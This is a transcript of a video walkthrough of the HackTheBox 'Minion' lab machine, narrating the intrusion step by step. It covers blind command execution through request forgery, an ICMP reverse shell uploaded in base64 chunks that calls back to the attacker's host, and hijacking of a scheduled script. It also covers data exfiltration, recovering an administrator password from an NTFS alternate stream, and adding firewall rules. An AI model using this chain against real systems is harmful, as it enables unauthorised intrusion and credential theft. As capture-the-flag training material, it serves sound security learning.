What's going on YouTube? This is IppSec and we're doing Minion from HackTheBox, which is a really tough machine for both the right and wrong reasons. Some of the right reasons are because of the firewall that forces you to do an ICMP reverse shell, hiding data in a NTFS file stream, some reverse engineering. There's a lot of cool things about this box, but there's also a lot of bad things that I didn't like about it. So when you're forcing people to do the things I just said, it's a bit insulting to also make them do full TCP port scans, multiple GoBusters to find hidden content, and just rabbit holes that don't really lead anywhere. So with that being said, let's jump in. The first thing we do is a nmap, so nmap-sc for default script, sv, enumerate versions, oa, output all formats, put in the directory called nmap, label this initial, and the IP address of Minion, which is 10.10.10.57. This takes time, so I already ran it. Looking at the results, we see not a single port is open. So I copied this IP address, pinged the box to verify it is up, and then thought, well, I can either do, I guess, UDP scans, or we can do a full TCP port scan. So let's start off with the full TCP port with nmap-p-. That does ports 1 to 65,535. Then -T4 to make it a bit more aggressive / faster. Then output all formats, and we'll call this nmap all ports, and the IP address of Minion. This also takes time, so I have it ran, and we can just look at the results. We do see it took 415 seconds, so around, I guess, 6.5 minutes, but one port does come back. It is port 62,696. So what I'm going to do now is, let's just do nmap-sc-sv, and do -n to not do DNS, and -p to specify that port, 10.10.10.57. If I could type. And this should only take a second because we're just doing one port, and it will tell us what is listening on this. Spoiler, it's going to be HTTP. There we go. So we do see it come back. We have a directory /backend. It is IIS 8.5, which I believe is 2012. We can go to Google, IIS 8.5, 2012 R2. So let's check out what that site looks like. 10.10.10.57, port 62,696, and we get a big web page. So we can go to the blog, and this is his, I guess, just public blog. Nothing really interesting there. We look at the page source. We can see a base64 string. So let's take a look at what this is. And the reason why I said base64 is just it's a long blob of characters, and normally that means base64. I have no clue what I just was thinking there, but base64 decode, this looks like it is a different language, not any type of encoding. So let's just go to translategoogle.com, paste the language, we see it as Italian. And in the middle of the walk of a life, I found myself in a dark forest because the straight way was lost. No idea what this means, so let's move on. We have a big image, so let's just take a look at this. And we will also check out what /backend is. Instance not running, check the source, nothing there. So let us start up a GoBuster. And we'll do, let's see what flags we want. We want -w for word list, user share word list, GoBuster, and then directory list 2.3 medium.txt. -x for file extension. I'm going to do ASP because we know this is a IIS server, and that is common amongst that. And then we need the IP address, which is -u. 10.10.10.57 port. Let's copy this. Let that run, and then we'll look at the Minion image while that goes. Let's copy the image to a directory, so downloads Minion, And then we can just do a few things on it, like let's do strings. Going down doesn't look interesting. We can do a bin walk on it. And we can also do, let's see, exif tool to look at the metadata. And we don't see anything there. Looking at our GoBuster results, we do see test.asp came back. So let's stop that and go check what test.asp is. Missing parameter in URL u and GET request. So we need to specify u, and this can be a URL. So HTTP, let's do our own box, 10, 10, 14, I think I'm 30. I am 30, and let's start up Python simple HTTP server on port 80. Internal server error, we don't get anything, so let's do something, a URL that we actually know is valid, and that is the web server itself. And we get a page back. So we got a cross-site request forgery here. So let's try something like the loopback address. And we have a page back right away. We have edit configuration, start stop instance, view summary, view logs, and system commands. Control U, we have these links actually go nowhere. There's one link that goes to cmd.aspx. So let's test that out. And we get 404, nothing. Let's just get out of view source so it's a bit more prettier to read. And file not found. Oh. So what happened was we clicked this link and it brought us to 127.0.0.1 cmd.aspx, and then a Python web server responded to us. So what we have to do is have this URL actually 127.0.0.1 cmd.aspx. And we have enter your shell command. So let's do hostname. When we hit enter, we have an error because it gets rid of our CSRF. So let's go back. Let's now send this to burp. Make sure burp is on intercept. It is. And we can just send this to the repeater tab and now run this command. And we're still posting to where we don't want to post. So let's do question mark, and then it's sending xcmd equals hostname. So this, we have two URLs and one. So let's break this down so it's a bit easier to see. We'll call this notes, I guess. So we have the first URL, which is going to call this URL. So I don't know how I can explain that easily, quickly. So we're just going to do it. So let's see. Intercept on, off to clear the history. Click enter. We're going to URL encode this second question mark to make it a valid HTTP request. I don't know if that's needed, but question marks go between URL and arguments. And if you want to separate arguments after that, it would be and. But we don't want to use and because this is a second URL in the URL. It's a bit URL inception. Hopefully that makes sense. And we see exit status of 1 when we just do hostname. So we don't get any output back. And in Bash, in PowerShell, we can just do PowerShell exit. We'll do 10. And we'll URL encode this to see if we can get any output back. So we have verified we have code execution because we're just executing PowerShell. We can change this exit status and change the output of this. So we could write a Python script and run a command like 20 times, looping one character at a time and converting exit status to characters, but that is a bit of a pain. So let's see if we can write any files anywhere. So we'll do, let's see, echo IppSec, direct this to C:\\temp normally exist, and then we can do IppSec. Click go. We get exit status of 0. So if this directory didn't exist, let's just put something we know doesn't exist. Exit status of 1. So we know we probably just wrote to C:\temp IppSec. We could write somewhere we definitely can't write, and that's C:\Windows System32. And we also get an exit status of 1. So most likely we wrote the file C:\temp IppSec. And then, since we can write files, we can now write a reverse shell. But before we get a reverse shell, we should see what port we can access, or what port the server can talk to us in. So we have one way to write files to the server. We have another way to execute code. Now we need to find a way to get the server talking back to us, because when we did the CSRF with our IP address, we didn't get anything back from the server. So there's a firewall between the server and us. So let's do something to test if we can get the server talking to us. So save this request. We'll save this as cmd execution. And now we need to do another request, which is just going back to this 10.10.14.30, and we'll just copy this. So for IN sequence 1 to 65,535, every TCP port, we will do a curl on HTTP 10.10.10.57.62696, and then /test.asp, then us on I. So what this is going to do, and we just echo this out first to show you what it's doing in case you can't read that code. It's going to make a port request back to us for every single port, or connect to us. So we can get rid of this, and then open up a new pane, and we'll do a TCP dump. Because we will be making the 65,000 connections back to us, and we don't want to listen on all the ports, so TCP dump will tell us when the server actually makes the connection. So TCP dump -I specify the interface, and then we can write a filter just like we would in Wireshark. So src host 10.10.10.57, and if we just ran this and ran our test connection, oh, we got GoBuster going. So we see a bunch of data already. So we want to do and TCP flags is equal to TCP-SYN. Like that. And the reason for this is we want to see when the server initiates a connection to us. And the three-way handshake, I believe, goes the initiator sends a SYN, then the next packet back is an ACK, and then we send a SYN ACK or something. I forget the whole process of a three-way handshake. But I know SYN is the very first packet. So let's run that, and then run our test connection. And we can see it is sending a bunch of data. I didn't put any echoes in, so I don't know where it's at. So let's edit this real quick. Do v test connection. We can pipe that to dev null, and then we can just echo I. I could have done that a bit better, but at least we can see all the ports. And spoiler, we're not going to get anything back. It is actually ICMP. So let's create another window, and we can just do TCP dump -I ton 0 ICMP. And let's go back to our burp with command injection or execution. And we'll do ping -C1 10.10.10 or 10.10 14 30. I think -G is count and -N on Linux is count. I think it's different on Windows and Linux. We'll find out. But run this, exit status 1, so maybe not different, maybe it's -N. Exit 0, and we get one ICMP request. So at least we know we have ICMP between the server and us. Going back to this TCP dump window, we see nothing. We have done 1,000 ports already. And we could have done www.fuzz instead of writing our own script like we did, I think 2 boxes ago. I forget the name of that box. But that would have also been a valid way to test that. Anyways, since we have ICMP, we're going to do a program called Nashang. I think that's how you pronounce it. If you just do GitHub Nashang, and this is PowerShell for penetration testers. I don't know where it got the name, but we'll just git clone this. And there's one file in this that we want, and that is a ICMP reverse shell. And I forget what box we used Nashang on, but we used it before on a box we weren't doing any Metasploit with. Just because this particular package has a lot of just standard reverse shells like we do on Linux with netcats. So we go into shells, and there is a Invoke PowerShell ICMP. So let's take a look at that. And it didn't highlight the syntax. I guess I don't have PowerShell syntax in Vim. But we see parameter of IP address, delay, buffer size, and we know we need to set this value to ignore all. So this is telling us how to run it. And we also need a file called icmpsh_m.py. So this is the actual server piece, and Nashang doesn't have that. So let's just Google this to get this package. What was it? It didn't copy. ICMP_sh_m. So let's go to the root of this GitHub page so we can clone this. And then git clone. So on the host or the attack box, we run this so we don't respond to ICMP packets because we're sending us ICMP packets as a shell. So we don't want our kernel or whatever it is on our box to automatically respond. So we have to set that to ignore, and then we can execute this box which handles the actual shell. And then on the target or victim, we just execute invoke PowerShell ICMP-IP address and then the IP address of our box. But since we don't really have an interactive connection, I'm just going to put that at the very bottom of this. So when I execute the script, it automatically executes that. So we'll do 10, 10, 14, 30. And we want to grep that sysctl value out. Shell ICMP. So we'll definitely want to run this. We'll just do that now so we don't forget to do that. And then let's copy where is it? That ICMP file out. Put up 2 directories. And I really hate editing files that are in the repository directory, so let's just remove that edit. Because I copied it here, so we have that file here. So the next thing we do is have to figure a way to get this giant file to, I don't know why I opened burp, the server, sending it one line at a time. And that is rather annoying because there's a lot of bad characters. When we're doing lines, we're going to essentially loop through this whole file and then have a bunch of echo requests writing a HTTP request to say echo line to c:" temp IppSec.ps1. But the problem with doing this is there's going to be a lot of special characters in this. Like, I don't know. It probably won't like this, because if line contains that director, then it's going to be like echo test. And it's going to start writing this, because that's just how echo is going to behave. So we can't have things like that and who knows what other characters. So we'll just use base64 to send it on over. Because base64 is going to translate everything into standard characters, or just non-special characters, which don't have any odd behaviors. Unfortunately, PowerShell uses, I think, UTF-16 for like its strings, so we can't just do the base64 on Linux command line, or if we do, it may have unknown issues. So I'm going to run PowerShell on Linux, which, if you use Empire, you probably already have. If you don't, I'm pretty sure it's in Kali's apt repository. Yeah, you got PowerShell. So if we just run PowerShell, we have a PowerShell command line on our Linux box, which is pretty cool because now we can just do the base64 encodes in this PowerShell, and it's going to behave the same on the Windows box. So we'll do revshell is equal to get content, and that was invoke PowerShell ICMP.ps1. So revshell is just that file. So the next thing I'm going to write, and I just did that so you guys can copy it if you wanted to while I do the next, is we need to encode it. So we'll do encoded is equal to convert to base64 string revshell. Function. Oh, we need to convert it to bytes first. So bytes is equal to system text encoding Unicode get bytes revshell. So that string has now been converted to bytes. And then the final thing is, actually, to make it easier for the video, we run that command, then we run this command, and then we can run this command. And then encoded is a copy of our base64. So we can do encoded out file ICMP.ps1.b64. So if we go into terminal window 4, we can less ICMP ps1 b64, and we get the file. And I think that was it. I saw that it has those 2 bytes at the beginning. Yeah, I don't know why it has FF, FE. That may cause an error, I'm not positive. But you can see it's definitely not the standard base 64 we're all used to, because or a string, because we have bytes after that every time, because that's reading as 16 bytes instead of 8 bytes, I believe. Anyways, let's verify that all works and decode something. So encoded is that PowerShell string, so let's do decode is equal to system text encoding Unicode get string system convert from base 64 string encoded. And I think 2 parentheses. Decode. And we screwed up something because we don't have any line breaks whatsoever. And I know what I did wrong. We have to add this -raw option to get content, because it wasn't doing line breaks. Bytes encoded. Let's see. Still have that weird byte at the very beginning of the file, but I don't think that matters. Now we do decode, and we still don't have line breaks. Let's see. We'll do -raw there. Maybe it doesn't like it like that. And we'll call this shell, so it's got a whole new variable name. We'll call this bytes2 shell. I don't think I ever did the encoded command. I think I just wrote it to a file. Yeah. So that's why the output didn't change. But this is bytes2. Okay, so let's do out file. Oh, we don't have to do out file yet. Was decode. Okay, that's working better. So yeah, that was the issue, is I just goofed on one thing. So that's why we always test our payload before sending it, because mistakes are easy to make. So I just deleted the file, and we have encoded 2 is equal to a base 64 string. We can do out file and then ICMP PS1 B64. And we still probably have those 2 weird bytes at the beginning, but we prove we could still decode it. So maybe that's just a Windows string thing or something. But the next thing we have to do is get this in a format we can send it over a URL, because the maximum number of characters for a URL I think is around 2,000, and we have like 20,000 characters in this, which is quite a bit, especially if we're going to be sending it over HTTP, but it's a bit late because I've already done the encoding. If I wasn't so lazy, I would go back into this invoke shell and remove all this documentation, all these white spaces, etc. But I don't think it'll take that much longer. So in order to break it up on lines we can send over, I'm going to use a command called fold. And what that's going to do is just break it like this. So we can do fold -width, we'll do 120. Pipe that to temp, and then copy temp back over ICMP PS1 B64. So before we start working on sending it over, this could be a pain. Let's see, can I just copy this string? let's see. If I just copy this, it's still going to be UTF whatever. I thought I pasted. There we go. Okay, that fixed the formatting. I probably could run a program called like iconv or something. But what we need to do is make sure we don't have any pluses in this file. And we do. And the reason why pluses are bad is because curl isn't going to URL encode this. And this has a special format, and that is space. So if we set this over a URL in curl, this will just get translated to space and it won't be valid base 64. So we have to double encode this. So to do that, we'll just encode it first. So if we vim test, go to where the plus is. Okay. Go to burp, decoder, plus, encode as URL, that is %2b. So replace that, and then replace this. Okay, move test to ICMP PS1 B64. And now I think we'll be ready to send it. Actually, let's do one last thing. Vim ICMP PS. Let's double encode these equal signs, because I don't think it'll hurt anything. Equal encode as URL %3d. Okay. And the reason we're doing that is when you double encode something, so we have %3d, I forget what percent is, %25. When it goes over the wire, it's going to encode this as %25 %3d. And the web server is going to decode that %25 to a percent, and then it's going to also decode this %3d into an equal. So I think that will be all we need. So we can now send our file. So we can do vim, we'll copy test connection to send file.sh. And let's see if this works. So let's see. We need to do 127.0.0.1. What was it? cmd.aspx $cmd equals. Go back to repeater. cmd.aspx xcmd equals. And this is URL encoded to be %3f. Oh, this actually makes sense why we're doing the double URL encode. Because we're processing two URLs. So we have this nested URL. We send it to this web server. And when we send it to this web server, it decodes this to be the question mark. So when this web server then sends it, it sends it as a question mark, not %3f. Hopefully that makes sense while you're doing double URL encoding, because we're literally nesting in a URL, so you have to do double encoding. Hopefully that makes sense. So cmd, then we'll do let's see. We don't have to do that. We can do curl. We want to do -v -G x get and --data URL encode And these are all just curl flags. xcmd is equal to, we'll do IppSec, and IppSec is equal to echo line see. Before I do that, let's just trash this. I thought I'd save time by reusing code I wrote, but these two functions are actually really different, so not really reusing anything. So bin bash, we want to export IFS. This is, I think, internal field separator to loop by line instead of character, because by default, it's going to loop by character, and we want the field separator to be new line. So do that. Then for line in cat, was it ICMP.ps1.b64? Yep. Do IppSec is equal to echo line to c:\temp /IppSec.ps1. We'll do IppSec-shell.ps1. And all that's going to do is when we execute that, if we had to echo, it's going to echo all these commands. And we're going to send these commands to the web server. So that's all that's doing. So we have echo. We do the curl request to get us to where we can input a command. And now we're saying the command is IppSec. Hope that makes sense. It should. Trying to think if there's a better way I can explain this before we move on. And I think it's straightforward. So let's send this file and see what happens. I know I made a mistake somewhere. I wish I could read fast enough if we're getting error messages or not. And if I had made this smaller, we wouldn't send so many requests. I think that's right. We'll see. So this is where the tough part of the box comes, because you're a bit blind. So let's run the Python ICMP sh_pi. And keep in mind, we already did that sysctl to ignore pings. So we don't have to do that. But source address, which is, I guess our address, 10.10.14.30, and then 10.10.10.57. And then let's hope we did this correctly, because if we didn't, it's going to be a pain to troubleshoot. So xcmd PowerShell c:\temp IppSec-shell.ps1. Go. Didn't get an immediate response back. Good sign, but we don't have a shell. So bad. Oh, crap. We have to decode it on this end. So that file is just pure base64. Of course it can't execute it. So we can do PowerShell x is equal to, I'm not going to URL encode as I type. We're just going to type all this and then URL encode it after. So x is equal to get content Windows temp IppSec -shell.ps1.b64. Is that what I copied it as? I think I just copied it as a ps1. IppSec -shell.ps1. That's why I tried executing it right away, because I didn't label it as base64 encoded when uploading it. It'll actually be easier if we just do this in this Powershell, because we can verify. So x is equal to get content, and this is ICMP.ps1.b64. This will just replace it with IppSec-shell. Actually, let's do that now. mv to IppSec-shell.ps1. Then after that, we want to do a decode. So decode is equal to system text encoding Unicode get string system convert from base64 string x and that is not a valid base64 string. Oh, crap. Why do we do this to ourselves? %2b, that's a plus. That's a plus. And then we need equal equals. Okay. Decode. Decoded fine. So we can do decode out file c:\temp IppSec-icmp.ps1, I guess. Copy this. Go to burp. Paste. And URL encode. Exit status of 255. So we probably screwed something up. URL decode. Get content. c:\temp IppSec-shell.ps1. Let's try that. Error 255. You can see why I hate this box. So if we get rid of this decode stuff, that's the only piece we didn't test. Exit status 0. So maybe we just didn't write it to file correctly. Decode pipe out file. Huh. Works on that. c:\temp. Let's see. If we do type, which is essentially cat and bash, c:\temp IppSec dash, was it shell? ICMP.ps1. IppSec dash ICMP.ps1. X dash of 1. We do shell 0. So we know shell exists, but ICMP doesn't exist. So it has to do with how we're writing the file. So we can do decode. Let's WL encode this, see if that helps. It does not. We can probably just decode C colon window temp IppSec ICMP.ps1. So instead of using outFile, I just used that pipe director, and it looks like it wrote. So now when we rerun this type on C colon temp Windows IppSec ICMP, we get exit status of 0, so that file exists. So get rid of all this, and have PowerShell execute C colon temp IppSec dash ICMP, and hope for the best. Go to a Python, and we do have a shell. So after all that debugging, we finally get the shell back. There is a bug in this program where occasionally it sends some characters twice. Don't know what that's about, but we don't really care. So cd ... and you can see it's not too quick. So let's just go to the root directory and do a dir to see what exists. I think I sent those commands too quick. So do dir again. And we see sysadm scripts, and that catches my eye right off the bat. So let's go into that directory and see what this is about. We got two scripts, c.ps1 and dellogs.bat. So we're going to do type c.ps1. For each argument in args, write host, dir, remove item. So it looks like it's deleting something, but we don't know because we don't know what args is. So let's look at what delete logs.bat is. And we have us executing PowerShell, Windows style hidden, exec bypass, not file. And we're executing that file and specifying c colon backslash access logs. And we're also echoing date, time, stop to c colon windows temp log.txt. So let's see if we can see this file. Type, see if we can see the log it creates. We don't see anything. So let's just dir on c colon windows temp. And we do see log.txt is created. And it was last write at 12:06 p.m. Looking at the date, we have 12:11. So it wrote about 5 minutes ago. And I wonder what the flag and dir is to get owner. We can probably get content. What was it? Is it get content? Dash properties star. I forget the PowerShell syntax to get a file owner. But we can see who owns this log.txt. So let's see. PowerShell get file owner. Get child item maybe. child item. For good copy. And we don't have the owner, but we can pipe that and do all of this. Nope. Select directory name. I actually don't know how to do. This is embarrassing. Let's just try dir/q. Does that do it? I really hate not having standard error displayed. Just for dir/q. So we have right. We're just gonna, I guess, move on because obviously I'm having trouble with this. But I'm sure you can Google it and find it relatively quickly. It's just the record flag is on, so it's like having 1,000 people watch me and I make mistakes. So, anyways, we will do another. Where was I? Oh, let's just dir that logs again. So if we get child item on that, we can see last write time was still 12:11, but I think something's writing to that every 5 minutes because we look at date and let's see if we do it again. It should be running relatively soon. So it's 12:16:05. Last write time was 12:11. So let's check that get child item, see if anyone wrote to it. And now we have last write time as 12:16. So let's see if we can take over that c.ps1 file. So copy c:/c.ps1. No. c.ps1 to c.ps1.back. And we'll copy c:/temp IppSec-ICMP.ps1. I think that's what we called it. Yep. To c.ps1. Type c.ps1. And we have our shell. So we're going to exit out of this. Start up our server again. And wait for a new shell. Because in 5 minutes, it should call back to us and hit us. So I'm going to pause the stream because I don't feel like, or pause the stream. Pause the video because I don't feel like waiting 5 minutes and having that blank time. So we'll resume soon as we get the shell. So we got a new shell and we see Windows PowerShell running as user Decoder on Minion. If we do who am I, still says IIS. That's odd. I guess that was a bug in ICMP SH. Maybe we have 2 shells going? Okay, I don't know, but now we are a decoder. That was bizarre. I guess when we did exit, the shell didn't fully die. We'll see if we have any other issues. It looks like things are going fine. I think we have 2 shells going. Because I did cd users and ended up in Windows. This ICMP shell is not the most stable of things. So we can do dir on users. We see decoder.minion, so let's go in there. Try this again. I definitely think we have two shells going simultaneously. So we don't see the flag yet. So if we go into desktop, we will see the files. And we could send JAWS and other PowerShell enumeration scripts up here to run them for PrivEsc, but that is painful. So we're going to avoid that and just examine this backup.zip file because chances are it's going to be in this backup.zip. And you would go to decoder.minion desktop to get this user.txt and see this file. So it's something with this file. And we could use PowerShell to unzip it, but if that has any binaries or things like that in it, we can't really do much reversing on this box. So I'm going to try to copy backup.zip to, let's see, C colon, let's see what it is, dir C colon backslash. Let this run. We have inetpub, so dir C colon inetpub, and then public. So let's try copying it there. Copy backup.zip. Because if we can copy it there, we should be able to quickly exfil it. inetpub, public. Because we don't have standard error, we always have to list it afterwards, and we couldn't write there. So unfortunately, we don't have write access. So that leaves one thing, and we can try to use PowerShell to exfil this document. And I haven't done this yet, so we'll see if it works. I don't think it will. So backup file is equal to get content backup.zip. We want dash. Oh crap! I don't know what's happening. Who am I? Let's go to cd backslash. Forgot something. That's still in Windows. We have multiple shells going, and this is going to suck. Finish. Every 5 minutes, it's running a new version of the shell and kicking it back to us. Jesus Christ, this is a lot of files. Don't make this mistake. There we go. cd backslash, was it sysadmin scripts? If you do it again. Oh my god. I don't know why I threatened it. There's literally nothing I can do. I can control C out of it, but I don't think that will help. So because if I control C, it'll kill it on my end, but may not kill the shell on the remote server. So just gotta let this run its course. Set W's. It should be done soon. Task list / IM. I think that's right. Task list. There we go. Oh, we got a lot of PowerShell. And a lot of cmd.exe. Task kill / IM PowerShell.exe. Please never give me a response back. Who am I? Don't respond, please. It responded, so that did not work. Is there a /force? With filters, let's see. I think it's just /f. I think I just saw that. /f forces the command to be terminated. Copy. Let's force that. And hopefully it never responds. And then we can get a new shell. Who am I? It doesn't look like we can kill it. We'll just cd sysadmin scripts and hope for the best. dir:// cd sysadm scripts. Now we can copy c.ps1.back over c.ps1. Del c.ps1.back. Why are we back in System 32? This shell is annoying, as you can tell. cd /users decoder.minion desktop. dir. I must be doing something wrong with that task kill. I think I did that right. Anyways, let's just encode this. Backup is equal to get content -raw backup.zip. Why did it execute again? Did it actually not remove the file? This really... sysadm scripts. Del c:/sysadm scripts c.ps1. That file's no longer there. I'll revert the box when I'm done, but please say it's gone. Okay. So I think when I was running those delete scripts, because there's like 20 shells that are responding, it just wasn't in the directory. So hopefully the issues are all fixed. But just in case they're not, we're just going to use full paths from here on out. So backup zip is equal to get content c:/users decoder desktop backup.zip -raw. Then we can do bytes is equal to system text encoding unicode.get bytes on backup zip. And then encoded is equal to convert to base 64 string. And the really crappy thing is, I don't have standard error, so if this errored out, I have no idea. Encoded. Let's see if it sends us base 64 back. It does. Sweet. Now let's just hope my terminal is big enough to hold all this data. because this is a lot. I don't know what my tmux scrollback buffer is. And this is more than I expected. Considerably more than I expected now. It's just a simple small program. Why does this file have to be so big? And it's still going. This is the Energizer Bunny. There we go. Finished. So we can search my terminal for PS space. Got one. And we have the whole thing. Awesome. So put this in my buffer. Go all the way down. Copy. And we'll hope that there was no errors on outputting all that. Backup.zip.b64. It's going to take probably 30 seconds to paste. And we'll really hope this works. Okay, and it's copied. So we will exit this file and hope we can decode it. I'm doubting this is going to work just because it's probably in a different format than my base64 knows, but we'll try it anyways. If we do file, backup.zip, just says data. Let's try binwalk, see if binwalk can extract it. Doesn't see any magic bytes, so let's try PowerShell to decode it. And it's very possible that I'm trying to think. It just outputted a bit of garbage because of the shell we're working with. So if that's the case, it sucks, but it's a fact of life. So we want to create it for encoded. So encoded, get content. What's the file? Backup.zip.b64. We'll say encoded is equal to that. Okay. Then decode. Decode to backup.zip. We'll do backup2.zip. MD5 sum. And backup2.zip has a different MD5 sum than backup.zip. So the two base64 commands process that a little bit differently. If we backup 2.zip, it's still data. So there's one last thing we can try to do to recover this file. And that is use ICOMP to convert it from UTF-16 to UTF-8. And we want to do backup2.zip. And we will say that file is backup2.zip2, I guess. And we'll do backup2.zip2. And we get zip archive. So that was the problem. It's just the file format it was. And that is going back to highlight the issue we have with the Linux base64 and the PowerShell base64. And if we try that with just the PowerShell base64 encoded, we'll see if that works. File backup2zip3. So it would work. But yeah. Anyways, let's just unzip it. So backup.zip. Backup2.zip 2. And we have zip file is corrupt. Let's see. Backup2.zip 3 to backup2 b.zip. Unzip b.zip. See if that compresses. That is still corrupt. Can't bin walk it. Zip2 to b.zip. We'll see if this is just as corrupt. So it still errored in transferring this file. We can't really look in what this backup.zip is. So the last thing we can do is use Powershell to analyze, or to extract the use PowerShell to extract the zip on the server. So we still have a shell on it, so let's extract backup.zip with PowerShell. So we can do add type dash assembly system.io.compression file system io.compression.zip file extract to directory c:\/ users Decoder.minion backup.zip, and we need to specify where we extract to, so c:\/ temp. And I think we need a trailing slash there. We don't have standard errors, so we can't see if we screw this up, but we can hope for the best. dir c:\/ temp. Do not have it. So let's see if I can spot the error in the code. Just copy this, paste it into Google, see if I have any errors. If I don't, we will just move on because I'm tired of this rabbit hole that leads us nowhere. Extract to directory string. That should be right. C: users. Oh. Gosh darn it. Decoder Minion. Desktop. Backup.zip. C:\/ temp. Maybe this one will work. dir c:\/ temp. And we get secret.exe. Awesome. So we can just execute that file. And all it does is print the current directory. And if we examine this file in like IDA or something, which is what I was trying to do with copying it to my computer, we'd see that there's nothing else in this. So if we did that base64 a few times, we'd eventually get a copy that isn't screwed up onto a computer where we can analyze it, but it's a rabbit hole and I'm not going to spend much time on it. We may look at it at the very end if I remember. But we can do get item dash stream on c: users decoder desktop back decoder.minion desktop backup.zip. And we see there is a hidden stream in this data. We see this is NTFS file streams, and I guess you can Google them. It's just a way for files to append data, and this doesn't actually affect the file hash or anything. This is just data that is on an object in the NTFS file system. The legitimate use actually is when Internet Explorer downloads something, it puts a NTFS stream on that downloaded object, and that's what has, when you try to execute something, you get a box that pops up and says, this file was downloaded from the internet. Are you sure you want to execute it? And if you click yes, it removes that NTFS file stream, but as long as that stream exists, you get that pop-up box. So that's the legitimate use case, but it's often used to hide data. So we can do a get content on that file and specify dash stream, dash stream, and pass. And we get 32 characters, which is a MD5 sum. And we can just Google that. And we see HashKiller has it. So let's go over to HashKiller. Nah. My VM will die if you start running, whatchamacallit, a miner. ZAD87A. Submit. We see the password is 1234test. And that is the password for administrator. So if we did like Invoke Command, we could switch to that user. But it's a bit pain to use Invoke Command because you have to create a secure string to hold the password in PowerShell. So the easiest way to verify the account exists is to do like net use y:, then localhost/c, and then we can specify /user administrator, and then 1234test as the password. And we see the command succeeded. So if we go to y:, we're now at the C drive, and we could go into users administrator desktop. And it looks like my shell's... Nope, it's not behaving. dir y:, users administrator desktop. And we see root.text and root.exe. And if we execute root.text, so let's see. Type root.txt. We have to launch root.exe located in this folder to execute it. So if we execute root.exe, we get a thing saying, are you trying to cheat me? So, not quite there yet. And what I had done is I did a copy command, and I copied y:, users desktop root.exe to y:, what was it? Crap. Forget what IS is. Shoot. dir DRC : copy root.exe to administrator, nope, y:, inet pub, public, and then I could then download root.exe, and we can analyze this file. So let's use IDA, because IDA is now, well, there's a newer version of IDA that's free, which allows us to analyze 64-bit. So let's use that. IDA 64. There it is. Okay. Open root.exe. World file. Sure. It's opening. We go right to the main function, and we can see the assembly. So we see calls to get current directory, and then right after that we have load effective address, C: users administrator desktop, and then we have a string compare. So I'm guessing this str1 is probably going to be the result of this get current directory. But we have a compare, and then if they are the same, go down here, and if not, display are you trying to cheat me? So we need to make a path c:\\Windows users administrator desktop, and we could do that with Invoke Command, but still we don't need that. We'll do that in a minute, but we can look on the successful thing. We have it doing another load effective address, and this time it's pointed to a bunch of junk, and then makes a call to encrypt decrypt. Looking at this, we can kind of see just a basic function, and right off the bat it looks like it's doing some type of decrypt loop. Right up here is probably getting the length of the string. Then down here we have it making a call to strlen, so it's probably checking how much of the data have we decrypted, and if we've decrypted or encrypted the whole thing, go to the end. If not, let's loop. And that's why I thought right away this is a loop, just because we have one function, goes down here, this goes here, then all the way back up, then back here. And then we see some more things, and we see add EAX3, move, and then put character. So to me, this is looping over a string, character by character, incrementing the hex by 3, or not incrementing the hex, incrementing the character by 3, doing a shift, and then placing it as a new string, and then if that is completed, exit. So we can test that by, let's go to encrypt decrypt, not encrypt, main. We can copy this. I think that copied. It did. Sweet. So let's do v test dot. Oh, we can probably just, yeah, v decrypt.py. We can do for char in that. Let's do single quotes. Print char, and let's see if we loop character by character. We don't. Oh. So now we have a loop by character. So now instead of print char, we can do ordinal character plus 3. Actually, if we just do ordinal character, we can show what that is. It's just converting it into the ordinal format, so we can then plus 3, because that's what IDA said to do, right? Encrypt decrypt plus 3. So then we can convert that back into a character. And since this is Python 3, we can do end is equal to that. And what this does, it says don't print a new line after the print. And then we have root.text. The other way to do this is let's do the credentials. So this is definitely a bit of a pain. So let's do user is equal to /administrator, and // means local computer, don't do a domain. PW is equal to 1234 test. Secure PW is equal to convert to secure string. This is going to be PW as plain text -force. Now we can create a credential. So cred is equal to new object, system management automation PS credential user secpw. You can see all the loops you have to jump through when you don't have a TTY on Windows. Okay, so we have cred, so now we can do invoke command, computer name, localhost, credential, cred, dash script block. Who am I? I wonder if that's because of the annoying thing. Cred. No? Administrator. Okay. User is right. SecPW, convert to secure string. PW, that's correct. As plain text, correct. Dash force, that looks good. Cred, new object. Huh. Script block, let's just do C:, users, administrator, desktop, root.exe. I don't know, I'm getting access denied. Cred, and then that. I typed something wrong, so let's do this again. User is equal to, we'll just do administrative, we won't do the dot slash. PW is equal to 1234 test. Secure PW is equal to convert to secure string PW as plain text dash force credential new object system management automation PS credential user secure PW. We can also run this. Just say, are you trying to cheat me? Access denied. So we have something screwed up. Oh my god. Yes, that is it. The Powershell on Linux threw me off, guys. I was running that on my local box the entire time. I was wondering why I had like syntax highlighting I could do up and all those cool things. That looks like it's going to work. Let's see. Who am I? Let's see. Cred. Invoke command. Computer name. Localhost. Cred. Script block. Who am I? Let's separate this up. Run this a few times so it's on every shell that's here because screw this box. I think something, I'm getting an error message somewhere. I don't know where. Let's see. Copy. Paste. Let's see. IF credential is equal to that. I made a typo when I was redoing everything, I think. Good. There we go. We'll make this say, who am I? Okay, now we have command execution as root, that we've got that all settled. And we can do cd c:, users, administrator, desktop, because we have to be in that working directory, and then semicolon, root.exe. Oh, yeah, so are you trying to cheat me? I think I had to specify the whole frickin' path. cd c:, /users, administrator, desktop, c:, users, administrator, desktop, root.exe, and we get the hash. But since we are at a administrator level, we could have just done something like create a firewall rule. So let's close out of IDA real quick. Don't pack database. Yep. And we can do new net firewall rule. And you can see the different options you can do, but we can just do new net firewall rule dash display name IppSec remote address 10.10.14.30. Is it? How do we do inbound? Dash direction inbound, and we need to allow. So let's see. Dash action allow. Dash action allow. So after running this, we could nmap-p 445.3389 on 10.10.10.57. And we now get open ports, so our desktop 10.10.10.57. And we can say administrator 1234 test. And just remote desktop into this box. And when you do that, you can do cmd desktop root.exe and get it that way. So, hope you guys enjoyed the video. I know I struggled a little bit. This is an annoying box to work with that shell, but it's a learning experience. If I didn't have troubles and you had all these weird things happen when you were in the box, you'd be wondering what you did wrong. When in reality, ICMP shells just suck. So, take care. I'll see you next week.